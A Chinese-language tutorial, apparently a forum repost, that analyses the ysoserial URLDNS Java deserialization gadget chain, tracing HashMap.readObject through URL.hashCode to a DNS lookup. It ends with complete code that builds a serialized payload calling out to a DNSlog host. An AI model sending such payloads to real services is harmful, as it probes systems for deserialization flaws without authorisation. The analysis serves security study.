目录
JAVA序列化和反序列化的基本概念
简单测试
重写的readobject方法分析URLDNS的利用链方法中遍历key值执行putVal方法
触发:URL类中的hashCode方法触发DNS请求:
JAVA序列化和反序列化的基本概念
在分析URLDNS之前,必须了解JAVA序列化和反序列化的基本概念。
其中几个重要的概念:
需要让某个对象支持序列化机制,就必须让其类是可序列化,为了让某类可序列化的,该类就必须实现如下两个接口之一:
Serializable:标记接口,没有方法
Externalizable:该接口有方法需要实现,一般不用这种
序列化对象时,默认将里面所有属性都进行序列化,但除了static或transient修饰的成员。
序列化具备可继承性,也就是如果某类已经实现了序列化,则它的所有子类也已经默认实现了序列化。
序列化和反序列化的类
ObjectOutputStream:提供序列化功能
ObjectInputStream:提供反序列化功能
序列化方法:
.writeObject()
反序列化方法:
.readObject()
既然反序列化方法.readObject(),所以通常会在类中重写该方法,为实现反序列化的时候自动执行。
简单测试
- public class Urldns implements Serializable {
- public static void main(String[] args) throws Exception {
- Urldns urldns = new Urldns();
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("d:\\urldns.txt"));
- objectOutputStream.writeObject(urldns);
- }
- public void run(){
- System.out.println("urldns run");
- }
- private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException {
- System.out.println("urldns readObject");
- s.defaultReadObject();
- }
- }
对这个测试类Urldns做序列化后,反序列化的时候执行了重写的readobject方法。
- import java.io.*;
- public class Serializable_run implements Serializable{
- public void run(ObjectInputStream s) throws IOException, ClassNotFoundException {
- s.readObject();
- }
- public static void main(String[] args) throws Exception {
- Serializable_run serializable_run = new Serializable_run();
- serializable_run.run(new ObjectInputStream(new FileInputStream("d:\\urldns.txt")));
- }
- }
所以只要对readobject方法做重写就可以实现在反序列化该类的时候得到执行。
分析URLDNS的利用链
利用链的思路大致如此,那么分析URLDNS的利用链。
- public Object getObject(final String url) throws Exception {
- //Avoid DNS resolution during payload creation
- //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload.
- URLStreamHandler handler = new SilentURLStreamHandler();
- HashMap ht = new HashMap(); // HashMap that will contain the URL
- URL u = new URL(null, url, handler); // URL to use as the Key
- ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
- Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
- return ht;
- }
该类实际返回HashMap类型,但是HashMap用来用来存储数据的数组是transient,序列化时忽略数据。
因为HashMap重写了writeobject方法,在writeobject实现了对数据的序列化。
还存在重写readobject方法,那么分析readobject中的内容。
方法中遍历key值执行putVal方法
- private void readObject(java.io.ObjectInputStream s)
- throws IOException, ClassNotFoundException {
- // Read in the threshold (ignored), loadfactor, and any hidden stuff
- s.defaultReadObject();
- reinitialize();
- if (loadFactor <= 0 || Float.isNaN(loadFactor))
- throw new InvalidObjectException("Illegal load factor: " +
- loadFactor);
- s.readInt(); // Read and ignore number of buckets
- int mappings = s.readInt(); // Read number of mappings (size)
- if (mappings < 0)
- throw new InvalidObjectException("Illegal mappings count: " +
- mappings);
- else if (mappings > 0) { // (if zero, use defaults)
- // Size the table using given load factor only if within
- // range of 0.25...4.0
- float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
- float fc = (float)mappings / lf + 1.0f;
- int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
- DEFAULT_INITIAL_CAPACITY :
- (fc >= MAXIMUM_CAPACITY) ?
- MAXIMUM_CAPACITY :
- tableSizeFor((int)fc));
- float ft = (float)cap * lf;
- threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
- (int)ft : Integer.MAX_VALUE);
- // Check Map.Entry[].class since it's the nearest public type to
- // what we're actually creating.
- SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
- @SuppressWarnings({"rawtypes","unchecked"})
- Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
- table = tab;
- // Read the keys and values, and put the mappings in the HashMap
- for (int i = 0; i < mappings; i++) {
- @SuppressWarnings("unchecked")
- K key = (K) s.readObject();
- @SuppressWarnings("unchecked")
- V value = (V) s.readObject();
- putVal(hash(key), key, value, false, false);
- }
- }
- }
触发:
- putVal(hash(key), key, value, false, false);
触发:
- static final int hash(Object key) {
- int h;
- return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
- }
这里的key对象如果是URL对象,那么就
触发:URL类中的hashCode方法
- public synchronized int hashCode() {
- if (hashCode != -1)
- return hashCode;
- hashCode = handler.hashCode(this);
- return hashCode;
- }
- public synchronized int hashCode() {
- if (hashCode != -1)
- return hashCode;
- hashCode = handler.hashCode(this);
- return hashCode;
- }
- protected synchronized InetAddress getHostAddress(URL u) {
- if (u.hostAddress != null)
- return u.hostAddress;
- String host = u.getHost();
- if (host == null || host.equals("")) {
- return null;
- } else {
- try {
- u.hostAddress = InetAddress.getByName(host);
- } catch (UnknownHostException ex) {
- return null;
- } catch (SecurityException se) {
- return null;
- }
- }
- return u.hostAddress;
- }
在hashCode=-1的时候,可以触发DNS请求,而hashCode私有属性默认值为-1。
所以为了实现readobject方法的DNS请求,接下来要做的是:
1、制造一个HashMap对象,且key值为URL对象;
2、保持私有属性hashcode为-1;
所以构造DNS请求的HashMap对象内容应该是:
- public class Urldns implements Serializable {
- public static void main(String[] args) throws Exception {
- HashMap map = new HashMap();
- URL url = new URL("http://ixw9i.8n6xsg.dnslogimalloc.xyz");
- Class<?> aClass = Class.forName("java.net.URL");
- Field hashCode = aClass.getDeclaredField("hashCode");
- hashCode.setAccessible(true);
- hashCode.set(url,1);
- map.put(url, "xzjhlk");
- hashCode.set(url,-1);
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("d:\\urldns.txt"));
- objectOutputStream.writeObject(map);
- }
- }
至于为什么在序列化的时候要通过反射将url对象中的hashCode属性稍微非-1,是因为hashCode的put方法也实际调用的是putVal(hash(key), key, value, false, true);
这个过程将触发一次DNS请求。
以上就是java 安全ysoserial URLDNS利用链分析的详细内容,更多关于java 安全 ysoserial URLDNS的资料请关注中国红客联盟其它相关文章!
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
